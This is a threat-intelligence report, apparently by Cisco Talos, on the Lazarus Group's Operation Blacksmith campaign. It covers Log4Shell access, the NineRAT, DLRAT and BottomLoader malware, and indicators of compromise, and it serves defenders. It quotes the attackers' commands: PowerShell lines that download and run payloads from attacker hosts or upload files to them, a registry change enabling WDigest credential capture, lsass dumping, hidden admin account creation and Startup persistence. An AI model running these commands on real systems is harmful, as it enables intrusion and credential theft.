• Cisco Talos recently discovered a new campaign conducted by the Lazarus Group we’re calling “Operation Blacksmith,” employing at least three new DLang-based malware families, two of which are remote access trojans (RATs), where one of these uses Telegram bots and channels as a medium of command and control (C2) communications. We track this Telegram-based RAT as “NineRAT” and the non-Telegram-based RAT as “DLRAT.” We track the DLang-based downloader as “BottomLoader.”
  • Our latest findings indicate a definitive shift in the tactics of the North Korean APT group Lazarus Group. Over the past year and a half, Talos has disclosed three different remote access trojans (RATs) built using uncommon technologies in their development, like QtFramework, PowerBasic and, now, DLang.
  • Talos has observed an overlap between our findings in this campaign conducted by Lazarus including tactics, techniques and procedures (TTPs) consistent with the North Korean state-sponsored group Onyx Sleet (PLUTIONIUM), also known as the Andariel APT group. Andariel is widely considered to be an APT sub-group under the Lazarus umbrella. 
  • This campaign consists of continued opportunistic targeting of enterprises globally that publicly host and expose their vulnerable infrastructure to n-day vulnerability exploitation such as CVE-2021-44228 (Log4j). We have observed Lazarus target manufacturing, agricultural and physical security companies.

Lazarus Group’s, Operation Blacksmith compromised manufacturing, agriculture and physical security sectors

Operation Blacksmith involved the exploitation of CVE-2021-44228, also known as Log4Shell, and the use of a previously unknown DLang-based RAT utilizing Telegram as its C2 channel. We’re naming this malware family “NineRAT.” NineRAT was initially built around May 2022 and was first used in this campaign as early as March 2023, almost a year later, against a South American agricultural organization. We then saw NineRAT being used again around September 2023 against a European manufacturing entity. 

During our analysis, Talos found some overlap with the malicious attacks disclosed by Microsoft in October 2023 attributing the activity to Onyx Sleet, also known as PLUTIONIUM or Andariel. 

Talos agrees with other researchers’ assessment that the Lazarus APT is essentially an umbrella of sub-groups that support different objectives of North Korea in defense, politics, national security and research and development. Each sub-group operates its own campaigns and develops and deploys bespoke malware against their targets, not necessarily working in full coordination. Andariel is typically tasked with initial access, reconnaissance and establishing long-term access for espionage in support of North Korean government interests. In some cases, Andariel has also conducted ransomware attacks against healthcare organizations.

The current campaign, Operation Blacksmith, consists of similarities and overlaps in tooling and tactics observed in previous attacks conducted by the Andariel group within Lazarus.

A common artifact in this campaign was  “HazyLoad,” a custom-made proxy tool previously only seen in the Microsoft report. Talos found HazyLoad targeting a European firm and an American subsidiary of a South Korean physical security and surveillance company as early as May 2023.

In addition to Hazyload, we discovered “NineRAT” and two more distinct malware families — both DLang-based — being used by Lazarus. This includes a RAT family we’re calling “DLRAT” and a downloader we call “BottomLoader” meant to download additional payloads such as HazyLoad on an infected endpoint.

The adoption of DLang in Lazarus’ malware — NineRAT, DLRAT and BottomLoader

NineRAT uses Telegram as its C2 channel for accepting commands, communicating their outputs and even for inbound and outbound file transfer. The use of Telegram by Lazarus is likely to evade network and host-based detection measures by employing a legitimate service as a channel of C2 communications.

NineRAT consists of three components, a dropper binary that contains two other components embedded in it. The dropper will write the two components on the disk and delete itself. The first component is an instrumentor, called nsIookup.exe ( capital ‘i’ instead of lower case L) that will execute the second component and will be used in the persistence mechanism. Modular infection chains such as these are frequently used by threat actors to achieve a multitude of objectives from defense evasion to functional separation of components that can be upgraded or modified while avoiding noisy operations on an infected system.

The dropper will set up persistence for the first component using a BAT script. The persistence mechanism accepts a service name, the path to the first component and service creation parameters:

Service Creation command

sc create Aarsvc_XXXXXX binPath=c:\windows\system32\nsIookup.exe -k AarSvcGroup -p type=own start=auto DisplayName=Agent Activation Runtime_XXXXXX

(Note the use of a capital “i” instead of “L” in nslookup[.]exe.)

The instrumentor binary contains a preconfigured path to the NineRAT malware which is used to execute the malware:

Instrumentor binary (first component) containing the path to NineRAT malware on disk.

With NineRAT activated, the malware becomes the primary method of interaction with the infected host. However, previously deployed backdoor mechanisms, such as the reverse proxy tool HazyLoad, remain in place. The multiple tools give overlapping backdoor entries to the Lazarus Group with redundancies in the event a tool is discovered, enabling highly persistent access. In previous intrusions such as the one disclosed by Talos in 2022, Lazarus relied heavily on the use of proxy tools as a means of continued access to issue commands and exfiltrate data.

The Telegram C2 channels used by the malware led to the discovery of a previously public Telegram bot “[at]StudyJ001Bot” that was leveraged by Lazarus in NineRAT. This Bot is publicly illustrated along with its ID and communication URL in a tutorial in Korean language from 2020. Using a publicly accessible bot may lead to infrastructure hijacking and likely having recognized that, Lazarus started using their own Bots for NineRAT. Interestingly, switching over to their own Telegram C2 channels, however, did not deter the use of older NineRAT samples using open channels. Anadriel has continued to use them well into 2023, even though they first started work on NineRAT in 2022. NineRAT typically consists of two API tokens for interacting with two different Telegram channels — one of these tokens is publicly listed.

NineRAT interacts with the Telegram channel using DLang-based libraries implemented to talk to Telegram’s APIs. Initially, the implant tests authentication using the getMe method. The implant can upload documents to Telegram using the sendDocument method/endpoint or download files via the getFile method. The malware can accept the following commands from their operator Telegram:

Command

Capability

/info

Gather preliminary information about the infected system.

/setmtoken

Set a token value.

/setbtoken

Set a new Bot token.

/setinterval

Set time interval between malware polls to the Telegram channel.

/setsleep

Set a time period for which the malware should sleep/lie dormant.

/upgrade

Upgrade to a new version of the implant.

/exit

Exit execution of the malware.

/uninstall

Uninstall self from the endpoint.

/sendfile

Send a file to the C2 server from the infected endpoint.

NineRAT can also uninstall itself from the system using a BAT file.

Below are some of the commands run by NineRAT for reconnaissance:

Command

Intent

whoami

System Information Discovery [T1082]

wmic os get osarchitecture

System Information Discovery [T1082]

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName

Software Discovery [T1518]

Pivoting off the NineRAT samples, we discovered two additional malware families written in DLang by Lazarus. One of these is simply a downloader we track as “BottomLoader” meant to download and execute the next stage payload from a remote host such as HazyLoad:

Strings and embedded payload URL in the DLang-based downloader, BottomLoader.

BottomLoader can download the next stage payload from a hardcoded remote URL via a PowerShell command:

powershell Invoke-webrequest -URI <URL> -outfile <file_location_on_system>

It can also upload files to the C2, again using PowerShell:

powershell (New-Object System.Net.WebClient).UploadFile('<file_path>','<remote_url>’)

BottomLoader can also create persistence for newer versions or completely new follow-up payloads by creating a “.URL” file in the Startup directory to run the PowerShell command to download the payload. The URL file is constructed using the following commands:

Command

echo [InternetShortcut] > "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"

echo URL="" >> "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"

echo IconFile=C:\WINDOWS\system32\SHELL32.dll >> "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"

echo IconIndex=20 >> "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"

The other malware is a downloader and RAT, we track as “DLRAT,” which can be used to deploy additional malware and retrieve commands from the C2 and execute them on the infected endpoints:

DLRAT: A DLang-based RAT and downloader.

This malware contains hardcoded commands to perform system reconnaissance. It starts by executing the commands on the endpoint to gather preliminary information about the system: “ver”, “whoami” and “getmac”. With this, the operators will have information about the version of the operating system, which user is running the malware and MAC address that allows them to identify the system on the network.

DLRAT code snippet consisting of preliminary data gathering capabilities.

Once the first initialization and beacon is performed, an initialization file is created, in the same directory, with the name “SynUnst.ini”.

After beaconing to the C2, the RAT will post, in a multipart format, the collected information and hardcoded session information.

During our analysis, we found that the session information ID used by DLRAT as part of its communications with its C2 server is “23wfow02rofw391ng23“, which is the same value that we found during our previous research into MagicRAT. In the case of MagicRAT, the value is encoded as an HTML post. But with DLRAT, it's being posted as multipart/form-data. This session information is hardcoded into the DLRAT malware as a base64-encoded string constructed on the process stack during runtime:

Hardcoded Session ID in DLRAT, the same as MagicRAT.

The C2 reply only contains the external IP address of the implant. The malware recognizes the following command codes/names sent by the C2 servers to execute corresponding actions on the infected system:

Command name

Capability

deleteme

Delete itself from the system using a BAT file.

download

Download files from a specified remote location.

rename

Rename files on the system.

iamsleep

Instructs the implant to go to sleep for a specified amount of time.

upload

Upload files to C2.

showurls

Empty command (Not implemented yet).

Illustrating operation Blacksmith

This particular attack observed by Talos involves the successful exploitation of CVE-2021-44228, also known as Log4Shell, on publicly facing VMWare Horizon servers, as a means of initial access to vulnerable public-facing servers. Preliminary reconnaissance follows the initial access leading to the deployment of a custom-made implant on the infected system. 

Typical Infection chain observed in Operation Blacksmith.

Phase 1: Initial reconnaissance by Lazarus

Lazarus’s initial access begins with successful exploitation of CVE-2021-44228, the infamous Log4j vulnerability discovered in 2021. The vulnerability has been extensively exploited by the Lazarus umbrella of APT groups to deploy several pieces of malware and dual-use tools, and to conduct extensive hands-on-keyboard activity.

Command

Intent

cmd.exe /c whoami

System Information Discovery [T1082]

cmd.exe /c wevtutil qe Microsoft-Windows-TerminalServices-LocalSessionManager/Operational /c:5 /q:*[System [(EventID=25)]] /rd:true /f:text

Query event logs: Get RDP session reconnection information

net user

System Information Discovery [T1082]

cmd.exe /c dir /a c:\users\

System Information Discovery [T1082]

cmd.exe /c netstat -nap tcp

System Information Discovery [T1082]

systeminfo

System Information Discovery [T1082]

cmd.exe /c Reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest

OS Credential Dumping [T1003/005]

cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

OS Credential Dumping [T1003/005]

Modify Registry [T1112]

cmd.exe /c tasklist | findstr Secu

Software Discovery [T1518]

Once the initial reconnaissance has been completed, Lazarus’ operators deployed HazyLoad, a proxy tool used to establish direct access to the infected system without having to repeatedly exploit CVE-2021-44228.

Command

Action

cmd[.]exe /c powershell[.]exe -ExecutionPolicy ByPass -WindowStyle Normal (New-Object System[.]Net[.]WebClient).DownloadFile('hxxp[://]/inet[.]txt', 'c:\windows\adfs\de\inetmgr[.]exe');

Download and execute HazyLoad

c:\windows\adfs\de\inetmgr[.]exe -i -p

Execute HazyLoad reverse proxy

cmd /C powershell Invoke-WebRequest hxxp[://]/down/bottom[.]gif -OutFile c:\windows\wininet64[.]exe

cmd /C c:\windows\wininet64[.]exe -i -p 443

Download and execute HazyLoad

In certain instances, the operators will also switch HazyLoad over to a new remote IP address. This is a common tactic attackers use to maintain continued access to previously compromised systems as their infrastructure evolves.

Command

Action

cmd /C taskkill /IM wininet64[.]exe /F

Stop original HazyLoad execution

cmd /C c:\windows\wininet64[.]exe -i -p 443

ReLaunch HazyLoad with new parameters

The threat actors also created an additional user account on the system, granting it administrative privileges. Talos documented this TTP earlier this year, but the activity observed previously was meant to create unauthorized user accounts at the domain level. In this campaign, the operators created a local account, which matches the user account documented by Microsoft.

Command

Intent

cmd.exe /c net user krtbgt /add

Account Creation [T1136]

cmd.exe /c net localgroup Administrators krtbgt /add

Account Creation

[T1098]

cmd.exe /c net localgroup Administrators

User Discovery [T1033]

Once the user account was successfully set up, the attackers switched over to it for their hands-on-keyboard activity, which constitutes a deviation from the pattern Cisco Talos previously documented. The hands-on-keyboard activity begins by downloading and using credential dumping utilities such as ProcDump and MimiKatz.

Command

Intent

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Credential harvesting [T1003]

pwdump.exe //Mimikatz

Credential harvesting [T1003]

Phase 2: Lazarus deploys NineRAT

Once the credential dumping is complete, Lazarus deploys a previously unknown RAT we’re calling “NineRAT” on the infected systems. NineRAT was first seen being used in the wild by Lazarus as early as March 2023. NineRAT is written in DLang and indicates a definitive shift in TTPs from APT groups falling under the Lazarus umbrella with the increased adoption of malware being authored using non-traditional frameworks such as the Qt framework, including MagicRAT and QuiteRAT.

Once NineRAT is activated, it accepts preliminary commands from the Telegram-based C2 channel, to again fingerprint the infected systems. Re-fingerprinting the infected systems indicates the data collected by Lazarus via NineRAT may be shared by other APT groups and essentially resides in a different repository from the fingerprint data collected initially by Lazarus during their initial access and implant deployment phase.

Commands typically executed by NineRAT include:

Command

Intent

cmd.exe /C ipconfig /all

System Information Discovery [T1082]

cmd.exe /C ver

System Information Discovery [T1082]

cmd.exe /C wmic os get osarchitecture

System Information Discovery [T1082]

cmd.exe /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName

Software Discovery [T1518]

cmd.exe /C net group /domain Domain Computers

System Information Discovery [T1082]

cmd.exe /C netstat -nap tcp

System Information Discovery [T1082]

cmd.exe /C whoami

System Information Discovery [T1082]

Coverage

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

IOCs for this research can also be found at our GitHub repository here.

Hashes

HazyLoad

000752074544950ae9020a35ccd77de277f1cd5026b4b9559279dc3b86965eee

NineRAT

534f5612954db99c86baa67ef51a3ad88bc21735bce7bb591afa8a4317c35433

ba8cd92cc059232203bcadee260ddbae273fc4c89b18424974955607476982c4

47e017b40d418374c0889e4d22aa48633b1d41b16b61b1f2897a39112a435d30

f91188d23b14526676706a5c9ead05c1a91ea0b9d6ac902623bc565e1c200a59

5b02fc3cfb5d74c09cab724b5b54c53a7c07e5766bffe5b1adf782c9e86a8541

82d4a0fef550af4f01a07041c16d851f262d859a3352475c62630e2c16a21def

BottomLoader

0e416e3cc1673d8fc3e7b2469e491c005152b9328515ea9bbd7cf96f1d23a99f

DLRAT

e615ea30dd37644526060689544c1a1d263b6bb77fe3084aa7883669c1fde12f

9a48357c06758217b3a99cdf4ab83263c04bdea98c347dd14b254cab6c81b13a

Network IOCs

tech[.]micrsofts[.]com

tech[.]micrsofts[.]tech

27[.]102[.]113[.]93

185[.]29[.]8[.]53

155[.]94[.]208[.]209

162[.]19[.]71[.]175

201[.]77[.]179[.]66

hxxp://27[.]102[.]113[.]93/inet[.]txt

hxxp[://]162[.]19[.]71[.]175:7443/sonic/bottom[.]gif

hxxp[://]201[.]77[.]179[.]66:8082/img/lndex[.]php

hxxp[://]201[.]77[.]179[.]66:8082/img/images/header/B691646991EBAEEC[.]gif

hxxp[://]201[.]77[.]179[.]66:8082/img/images/header/7AEBC320998FD5E5[.]gif